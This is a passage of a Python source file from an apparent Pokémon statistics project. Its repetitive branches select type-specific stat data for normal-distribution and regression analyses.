stat_values = loaddata.legendary_fairy_types['sp_defense']
stat_stats = loaddata.legendary_fairy_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_fairy_types['height_m']
stat_stats = loaddata.legendary_fairy_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_fairy_types['weight_kg']
stat_stats = loaddata.legendary_fairy_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# normal pokemon
elif type_set == "10":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_normal_types['total_points']
stat_stats = loaddata.legendary_normal_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_normal_types['hp']
stat_stats = loaddata.legendary_normal_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_normal_types['speed']
stat_stats = loaddata.legendary_normal_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_normal_types['attack']
stat_stats = loaddata.legendary_normal_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_normal_types['defense']
stat_stats = loaddata.legendary_normal_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_normal_types['sp_attack']
stat_stats = loaddata.legendary_normal_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_normal_types['sp_defense']
stat_stats = loaddata.legendary_normal_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_normal_types['height_m']
stat_stats = loaddata.legendary_normal_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_normal_types['weight_kg']
stat_stats = loaddata.legendary_normal_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fighting pokemon
elif type_set == "11":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_fighting_types['total_points']
stat_stats = loaddata.legendary_fighting_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fighting_types['hp']
stat_stats = loaddata.legendary_fighting_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fighting_types['speed']
stat_stats = loaddata.legendary_fighting_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fighting_types['attack']
stat_stats = loaddata.legendary_fighting_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fighting_types['defense']
stat_stats = loaddata.legendary_fighting_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fighting_types['sp_attack']
stat_stats = loaddata.legendary_fighting_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_fighting_types['sp_defense']
stat_stats = loaddata.legendary_fighting_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_fighting_types['height_m']
stat_stats = loaddata.legendary_fighting_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_fighting_types['weight_kg']
stat_stats = loaddata.legendary_fighting_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# flying pokemon
elif type_set == "12":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_flying_types['total_points']
stat_stats = loaddata.legendary_flying_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_flying_types['hp']
stat_stats = loaddata.legendary_flying_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_flying_types['speed']
stat_stats = loaddata.legendary_flying_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_flying_types['attack']
stat_stats = loaddata.legendary_flying_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_flying_types['defense']
stat_stats = loaddata.legendary_flying_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_flying_types['sp_attack']
stat_stats = loaddata.legendary_flying_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_flying_types['sp_defense']
stat_stats = loaddata.legendary_flying_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_flying_types['height_m']
stat_stats = loaddata.legendary_flying_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_flying_types['weight_kg']
stat_stats = loaddata.legendary_flying_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# poison pokemon
elif type_set == "13":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_poison_types['total_points']
stat_stats = loaddata.legendary_poison_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_poison_types['hp']
stat_stats = loaddata.legendary_poison_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_poison_types['speed']
stat_stats = loaddata.legendary_poison_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_poison_types['attack']
stat_stats = loaddata.legendary_poison_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_poison_types['defense']
stat_stats = loaddata.legendary_poison_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_poison_types['sp_attack']
stat_stats = loaddata.legendary_poison_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_poison_types['sp_defense']
stat_stats = loaddata.legendary_poison_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_poison_types['height_m']
stat_stats = loaddata.legendary_poison_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_poison_types['weight_kg']
stat_stats = loaddata.legendary_poison_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ground pokemon
elif type_set == "14":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_ground_types['total_points']
stat_stats = loaddata.legendary_ground_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ground_types['hp']
stat_stats = loaddata.legendary_ground_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ground_types['speed']
stat_stats = loaddata.legendary_ground_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ground_types['attack']
stat_stats = loaddata.legendary_ground_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ground_types['defense']
stat_stats = loaddata.legendary_ground_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ground_types['sp_attack']
stat_stats = loaddata.legendary_ground_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ground_types['sp_defense']
stat_stats = loaddata.legendary_ground_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_ground_types['height_m']
stat_stats = loaddata.legendary_ground_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_ground_types['weight_kg']
stat_stats = loaddata.legendary_ground_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# rock pokemon
elif type_set == "15":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_rock_types['total_points']
stat_stats = loaddata.legendary_rock_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_rock_types['hp']
stat_stats = loaddata.legendary_rock_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_rock_types['speed']
stat_stats = loaddata.legendary_rock_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_rock_types['attack']
stat_stats = loaddata.legendary_rock_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_rock_types['defense']
stat_stats = loaddata.legendary_rock_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_rock_types['sp_attack']
stat_stats = loaddata.legendary_rock_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_rock_types['sp_defense']
stat_stats = loaddata.legendary_rock_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_rock_types['height_m']
stat_stats = loaddata.legendary_rock_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_rock_types['weight_kg']
stat_stats = loaddata.legendary_rock_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# bug pokemon
elif type_set == "16":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_bug_types['total_points']
stat_stats = loaddata.legendary_bug_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_bug_types['hp']
stat_stats = loaddata.legendary_bug_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_bug_types['speed']
stat_stats = loaddata.legendary_bug_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_bug_types['attack']
stat_stats = loaddata.legendary_bug_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_bug_types['defense']
stat_stats = loaddata.legendary_bug_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_bug_types['sp_attack']
stat_stats = loaddata.legendary_bug_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_bug_types['sp_defense']
stat_stats = loaddata.legendary_bug_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_bug_types['height_m']
stat_stats = loaddata.legendary_bug_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_bug_types['weight_kg']
stat_stats = loaddata.legendary_bug_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ghost pokemon
elif type_set == "17":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_ghost_types['total_points']
stat_stats = loaddata.legendary_ghost_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ghost_types['hp']
stat_stats = loaddata.legendary_ghost_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ghost_types['speed']
stat_stats = loaddata.legendary_ghost_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ghost_types['attack']
stat_stats = loaddata.legendary_ghost_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ghost_types['defense']
stat_stats = loaddata.legendary_ghost_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ghost_types['sp_attack']
stat_stats = loaddata.legendary_ghost_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_ghost_types['sp_defense']
stat_stats = loaddata.legendary_ghost_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_ghost_types['height_m']
stat_stats = loaddata.legendary_ghost_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_ghost_types['weight_kg']
stat_stats = loaddata.legendary_ghost_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# steel pokemon
elif type_set == "18":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_steel_types['total_points']
stat_stats = loaddata.legendary_steel_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_steel_types['hp']
stat_stats = loaddata.legendary_steel_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_steel_types['speed']
stat_stats = loaddata.legendary_steel_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_steel_types['attack']
stat_stats = loaddata.legendary_steel_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_steel_types['defense']
stat_stats = loaddata.legendary_steel_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_steel_types['sp_attack']
stat_stats = loaddata.legendary_steel_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_steel_types['sp_defense']
stat_stats = loaddata.legendary_steel_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_steel_types['height_m']
stat_stats = loaddata.legendary_steel_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_steel_types['weight_kg']
stat_stats = loaddata.legendary_steel_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# all pokemon (trimmed h & w)
elif type_set == "19":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.legendary_total_points
stat_stats = loaddata.legendary_total_points_stats
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.legendary_hp
stat_stats = loaddata.legendary_hp_stats
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.legendary_speed
stat_stats = loaddata.legendary_speed_stats
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_attack
stat_stats = loaddata.legendary_attack_stats
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_defense
stat_stats = loaddata.legendary_defense_stats
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.legendary_sp_attack
stat_stats = loaddata.legendary_sp_attack_stats
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.legendary_sp_defense
stat_stats = loaddata.legendary_sp_defense_stats
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.legendary_height
stat_stats = loaddata.legendary_height_stats
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.legendary_weight
stat_stats = loaddata.legendary_weight_stats
unit = '(kg)'
else:
return
else:
return
else:
return
# grass pokemon
if type_set == "1":
set_type = "Grass Type "
# fire pokemon
elif type_set == "2":
set_type = "Fire Type "
# water pokemon
elif type_set == "3":
set_type = "Water Type "
# electric pokemon
elif type_set == "4":
set_type = "Electric Type "
# psychic pokemon
elif type_set == "5":
set_type = "Psychic Type "
# ice pokemon
elif type_set == "6":
set_type = "Ice Type "
# dragon pokemon
elif type_set == "7":
set_type = "Dragon Type "
# dark pokemon
elif type_set == "8":
set_type = "Dark Type "
# fairy pokemon
elif type_set == "9":
set_type = "Fairy Type "
# normal pokemon
elif type_set == "10":
set_type = "Normal Type "
# fighting pokemon
elif type_set == "11":
set_type = "Fighting Type "
# flying pokemon
elif type_set == "12":
set_type = "Flying Type "
# poison pokemon
elif type_set == "13":
set_type = "Poison Type "
# ground pokemon
elif type_set == "14":
set_type = "Ground Type "
# rock pokemon
elif type_set == "15":
set_type = "Rock Type "
# bug pokemon
elif type_set == "16":
set_type = "Bug Type "
# ghost pokemon
elif type_set == "17":
set_type = "Ghost Type "
# steel pokemon
elif type_set == "18":
set_type = "Steel Type "
# all pokemon
else:
set_type = ''
pokemon_normal_dist_and_actual_vals.run_normal_dist_vs_actual(stat_values, stat_stats, test_bounds, set_name,
stat_name, unit, modifier, set_type)
return
def do_regression_analysis_non_legendary(option):
if option == "1":
set_name = "Grass Type"
set_data = loaddata.non_legendary_grass_types
z_set_data = loaddata.z_non_legendary_grass
elif option == "2":
set_name = "Fire Type"
set_data = loaddata.non_legendary_fire_types
z_set_data = loaddata.z_non_legendary_fire
elif option == "3":
set_name = "Water Type"
set_data = loaddata.non_legendary_water_types
z_set_data = loaddata.z_non_legendary_water
elif option == "4":
set_name = "Electric Type"
set_data = loaddata.non_legendary_electric_types
z_set_data = loaddata.z_non_legendary_electric
elif option == "5":
set_name = "Psychic Type"
set_data = loaddata.non_legendary_psychic_types
z_set_data = loaddata.z_non_legendary_psychic
elif option == "6":
set_name = "Ice Type"
set_data = loaddata.non_legendary_ice_types
z_set_data = loaddata.z_non_legendary_ice
elif option == "7":
set_name = "Dragon Type"
set_data = loaddata.non_legendary_dragon_types
z_set_data = loaddata.z_non_legendary_dragon
elif option == "8":
set_name = "Dark Type"
set_data = loaddata.non_legendary_dark_types
z_set_data = loaddata.z_non_legendary_dark
elif option == "9":
set_name = "Fairy Type"
set_data = loaddata.non_legendary_fairy_types
z_set_data = loaddata.z_non_legendary_fairy
elif option == "10":
set_name = "Normal Type"
set_data = loaddata.non_legendary_normal_types
z_set_data = loaddata.z_non_legendary_normal
elif option == "11":
set_name = "Fighting Type"
set_data = loaddata.non_legendary_fighting_types
z_set_data = loaddata.z_non_legendary_fighting
elif option == "12":
set_name = "Flying Type"
set_data = loaddata.non_legendary_flying_types
z_set_data = loaddata.z_non_legendary_flying
elif option == "13":
set_name = "Poison Type"
set_data = loaddata.non_legendary_poison_types
z_set_data = loaddata.z_non_legendary_poison
elif option == "14":
set_name = "Ground Type"
set_data = loaddata.non_legendary_ground_types
z_set_data = loaddata.z_non_legendary_ground
elif option == "15":
set_name = "Rock Type"
set_data = loaddata.non_legendary_rock_types
z_set_data = loaddata.z_non_legendary_rock
elif option == "16":
set_name = "Bug Type"
set_data = loaddata.non_legendary_bug_types
z_set_data = loaddata.z_non_legendary_bug
elif option == "17":
set_name = "Ghost Type"
set_data = loaddata.non_legendary_ghost_types
z_set_data = loaddata.z_non_legendary_ghost
elif option == "18":
set_name = "Steel Type"
set_data = loaddata.non_legendary_steel_types
z_set_data = loaddata.z_non_legendary_steel
elif option == "19":
set_name = "Pokemon"
set_data = loaddata.non_legendary_pokemon
z_set_data = loaddata.z_pokemon_non_legendary
else:
return
pokemon_regression.pokemon_regression_analysis(set_name, set_data, z_set_data, modified_data_tag='(non legendary)')
return
def do_regression_analysis_legendary(option):
if option == "1":
set_name = "Grass Type"
set_data = loaddata.legendary_grass_types
z_set_data = loaddata.z_legendary_grass
elif option == "2":
set_name = "Fire Type"
set_data = loaddata.legendary_fire_types
z_set_data = loaddata.z_legendary_fire
elif option == "3":
set_name = "Water Type"
set_data = loaddata.legendary_water_types
z_set_data = loaddata.z_legendary_water
elif option == "4":
set_name = "Electric Type"
set_data = loaddata.legendary_electric_types
z_set_data = loaddata.z_legendary_electric
elif option == "5":
set_name = "Psychic Type"
set_data = loaddata.legendary_psychic_types
z_set_data = loaddata.z_legendary_psychic
elif option == "6":
set_name = "Ice Type"
set_data = loaddata.legendary_ice_types
z_set_data = loaddata.z_legendary_ice
elif option == "7":
set_name = "Dragon Type"
set_data = loaddata.legendary_dragon_types
z_set_data = loaddata.z_legendary_dragon
elif option == "8":
set_name = "Dark Type"
set_data = loaddata.legendary_dark_types
z_set_data = loaddata.z_legendary_dark
elif option == "9":
set_name = "Fairy Type"
set_data = loaddata.legendary_fairy_types
z_set_data = loaddata.z_legendary_fairy
elif option == "10":
set_name = "Normal Type"
set_data = loaddata.legendary_normal_types
z_set_data = loaddata.z_legendary_normal
elif option == "11":
set_name = "Fighting Type"
set_data = loaddata.legendary_fighting_types
z_set_data = loaddata.z_legendary_fighting
elif option == "12":
set_name = "Flying Type"
set_data = loaddata.legendary_flying_types
z_set_data = loaddata.z_legendary_flying
elif option == "13":
set_name = "Poison Type"
set_data = loaddata.legendary_poison_types
z_set_data = loaddata.z_legendary_poison
elif option == "14":
set_name = "Ground Type"
set_data = loaddata.legendary_ground_types
z_set_data = loaddata.z_legendary_ground
elif option == "15":
set_name = "Rock Type"
set_data = loaddata.legendary_rock_types
z_set_data = loaddata.z_legendary_rock
elif option == "16":
set_name = "Bug Type"
set_data = loaddata.legendary_bug_types
z_set_data = loaddata.z_legendary_bug
elif option == "17":
set_name = "Ghost Type"
set_data = loaddata.legendary_ghost_types
z_set_data = loaddata.z_legendary_ghost
elif option == "18":
set_name = "Steel Type"
set_data = loaddata.legendary_steel_types
z_set_data = loaddata.z_legendary_steel
elif option == "19":
set_name = "Pokemon"
set_data = loaddata.legendary_pokemon
z_set_data = loaddata.z_pokemon_legendary
else:
return
pokemon_regression.pokemon_regression_analysis(set_name, set_data, z_set_data, modified_data_tag='(legendary)')
return
def do_regression_analysis_trimmed(option):
modified_data_tag = '(trimmed Height(m) & Weight(kg))'
if option == "1":
set_name = "Grass Type"
set_data = loaddata.trimmed_grass_types
z_set_data = loaddata.z_trimmed_grass
trim_data = loaddata.grass_trim_data
elif option == "2":
set_name = "Fire Type"
set_data = loaddata.trimmed_fire_types
z_set_data = loaddata.z_trimmed_fire
trim_data = loaddata.fire_trim_data
elif option == "3":
set_name = "Water Type"
set_data = loaddata.trimmed_water_types
z_set_data = loaddata.z_trimmed_water
trim_data = loaddata.water_trim_data
elif option == "4":
set_name = "Electric Type"
set_data = loaddata.trimmed_electric_types
z_set_data = loaddata.z_trimmed_electric
trim_data = loaddata.electric_trim_data
elif option == "5":
set_name = "Psychic Type"
set_data = loaddata.trimmed_psychic_types
z_set_data = loaddata.z_trimmed_psychic
trim_data = loaddata.psychic_trim_data
elif option == "6":
set_name = "Ice Type"
set_data = loaddata.trimmed_ice_types
z_set_data = loaddata.z_trimmed_ice
trim_data = loaddata.ice_trim_data
elif option == "7":
set_name = "Dragon Type"
set_data = loaddata.trimmed_dragon_types
z_set_data = loaddata.z_trimmed_dragon
trim_data = loaddata.dragon_trim_data
elif option == "8":
set_name = "Dark Type"
set_data = loaddata.trimmed_dark_types
z_set_data = loaddata.z_trimmed_dark
trim_data = loaddata.dark_trim_data
elif option == "9":
set_name = "Fairy Type"
set_data = loaddata.trimmed_fairy_types
z_set_data = loaddata.z_trimmed_fairy
trim_data = loaddata.fairy_trim_data
elif option == "10":
set_name = "Normal Type"
set_data = loaddata.trimmed_normal_types
z_set_data = loaddata.z_trimmed_normal
trim_data = loaddata.normal_trim_data
elif option == "11":
set_name = "Fighting Type"
set_data = loaddata.trimmed_fighting_types
z_set_data = loaddata.z_trimmed_fighting
trim_data = loaddata.fighting_trim_data
elif option == "12":
set_name = "Flying Type"
set_data = loaddata.trimmed_flying_types
z_set_data = loaddata.z_trimmed_flying
trim_data = loaddata.flying_trim_data
elif option == "13":
set_name = "Poison Type"
set_data = loaddata.trimmed_poison_types
z_set_data = loaddata.z_trimmed_poison
trim_data = loaddata.poison_trim_data
elif option == "14":
set_name = "Ground Type"
set_data = loaddata.trimmed_ground_types
z_set_data = loaddata.z_trimmed_ground
trim_data = loaddata.ground_trim_data
elif option == "15":
set_name = "Rock Type"
set_data = loaddata.trimmed_rock_types
z_set_data = loaddata.z_trimmed_rock
trim_data = loaddata.rock_trim_data
elif option == "16":
set_name = "Bug Type"
set_data = loaddata.trimmed_bug_types
z_set_data = loaddata.z_trimmed_bug
trim_data = loaddata.bug_trim_data
elif option == "17":
set_name = "Ghost Type"
set_data = loaddata.trimmed_ghost_types
z_set_data = loaddata.z_trimmed_ghost
trim_data = loaddata.ghost_trim_data
elif option == "18":
set_name = "Steel Type"
set_data = loaddata.trimmed_steel_types
z_set_data = loaddata.z_trimmed_steel
trim_data = loaddata.steel_trim_data
elif option == "19":
set_name = "Pokemon"
set_data = loaddata.pkm_trim_hw
z_set_data = loaddata.z_trimmed_pokemon
trim_data = loaddata.trim_data
elif option == "20":
set_name = "Pokemon"
set_data = loaddata.pokemon_trimmed_heights
z_set_data = loaddata.z_pokemon_t_h
trim_data = loaddata.trim_data_h
modified_data_tag = '(trimmed Height(m))'
elif option == "21":
set_name = "Pokemon"
set_data = loaddata.pokemon_trimmed_weights
z_set_data = loaddata.z_pokemon_t_w
trim_data = loaddata.trim_data_w
modified_data_tag = '(trimmed Weight(kg))'
else:
return
pokemon_regression.pokemon_regression_analysis(set_name, set_data, z_set_data, trim_data, modified_data_tag)
return
def do_regression_analysis_full(option):
modified_data_tag = ''
if option == "1":
set_name = "Grass Type"
set_data = loaddata.grass_types
z_set_data = loaddata.z_grass
elif option == "2":
set_name = "Fire Type"
set_data = loaddata.fire_types
z_set_data = loaddata.z_fire
elif option == "3":
set_name = "Water Type"
set_data = loaddata.water_types
z_set_data = loaddata.z_water
elif option == "4":
set_name = "Electric Type"
set_data = loaddata.electric_types
z_set_data = loaddata.z_electric
elif option == "5":
set_name = "Psychic Type"
set_data = loaddata.psychic_types
z_set_data = loaddata.z_psychic
elif option == "6":
set_name = "Ice Type"
set_data = loaddata.ice_types
z_set_data = loaddata.z_ice
elif option == "7":
set_name = "Dragon Type"
set_data = loaddata.dragon_types
z_set_data = loaddata.z_dragon
elif option == "8":
set_name = "Dark Type"
set_data = loaddata.dark_types
z_set_data = loaddata.z_dark
elif option == "9":
set_name = "Fairy Type"
set_data = loaddata.fairy_types
z_set_data = loaddata.z_fairy
elif option == "10":
set_name = "Normal Type"
set_data = loaddata.normal_types
z_set_data = loaddata.z_normal
elif option == "11":
set_name = "Fighting Type"
set_data = loaddata.fighting_types
z_set_data = loaddata.z_fighting
elif option == "12":
set_name = "Flying Type"
set_data = loaddata.flying_types
z_set_data = loaddata.z_flying
elif option == "13":
